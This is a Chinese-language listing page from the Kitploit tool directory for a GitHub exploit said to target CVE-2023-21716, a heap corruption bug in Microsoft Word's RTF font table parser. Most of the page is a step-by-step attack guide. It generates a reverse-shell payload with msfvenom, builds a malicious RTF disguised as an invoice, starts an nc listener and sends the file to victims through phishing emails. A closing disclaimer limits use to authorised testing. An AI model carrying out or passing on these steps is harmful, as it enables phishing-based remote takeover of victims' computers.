Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-21716 — CVE-2023-21716 - 利用反向 Shell 载荷的 Microsoft Word RTF fonttbl 堆损坏远程代码执行漏洞利用程序 | Kitploit
工具/GitHubGitHub/reggyraider/cve-2023-21716
钓鱼工具Payload生成漏洞利用Web应用程序漏洞利用渗透测试学习与教育二进制利用
GitHubreggyraider/cve-2023-21716

CVE-2023-21716

CVE-2023-21716 - 利用反向 Shell 载荷的 Microsoft Word RTF fonttbl 堆损坏远程代码执行漏洞利用程序

查看仓库
253个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-21716 — Microsoft Word RTF fonttbl 堆损坏远程代码执行漏洞

严重性: 严重 (CVSS 9.8)
受影响版本: Microsoft Word 2013 / 2016 / 2019 / 2021 (未打补丁)
补丁: 微软2023年2月补丁星期二
作者: REGGYRAIDER


漏洞概述

CVE-2023-21716 是 Microsoft Word 的 RTF 解析器 (wwlib.dll) 中的一个堆损坏漏洞。
当 Word 解析包含 超过 32 767 个字体条目 的 \fonttbl 指令时,一个内部的 有符号 16 位计数器会发生溢出,从而破坏堆元数据。攻击者只需向受害者发送一个精心构造的 .rtf 文件,即可实现 远程代码执行。

无需宏。除了打开文件外,无需用户交互。


设置与利用

步骤 1 — 使用 msfvenom 生成原始 shellcode

root@kitploit:~
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin

步骤 2 — 克隆此仓库

root@kitploit:~
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716

步骤 3 — 构建恶意 RTF

root@kitploit:~
python3 exploit.py payload.bin invoice_march2024.rtf

步骤 4 — 启动监听器

root@kitploit:~
nc -lvnp 4444

步骤 5 — 发送文件

通过 SMB、电子邮件附件或任何钓鱼途径上传。
当受害者在未打补丁的 Word 中打开 invoice_march2024.rtf 时,你将获得一个反向 shell。


工作原理

root@kitploit:~
攻击者创建 RTF              Word 解析 \fonttbl            堆被破坏
─────────────────────  ──►   ──────────────────────  ──►  ──────────────
\fonttbl 包含 32769+        有符号 16 位计数器            攻击者的
字体定义                    溢出 → 0x8000                shellcode 运行
  1. 该利用在 \fonttbl 中嵌入了 32 769 个 \f<N> 字体定义。
  2. Word 根据(现已溢出的)计数器分配一个固定大小的缓冲区。
  3. 后续的字体写入会 超出分配的缓冲区,破坏相邻的堆块。
  4. 原始 shellcode(来自 payload.bin)被放置在 \pict 内部,并落入被破坏的区域,当分配器处理它时,就会获得执行权限。

免责声明

此工具仅用于教育目的和授权的渗透测试。
在未拥有或未获得明确书面许可的系统上使用此漏洞是非法的。
作者不对滥用行为承担任何责任。


参考

  • 微软安全公告
  • NVD 条目
下载工具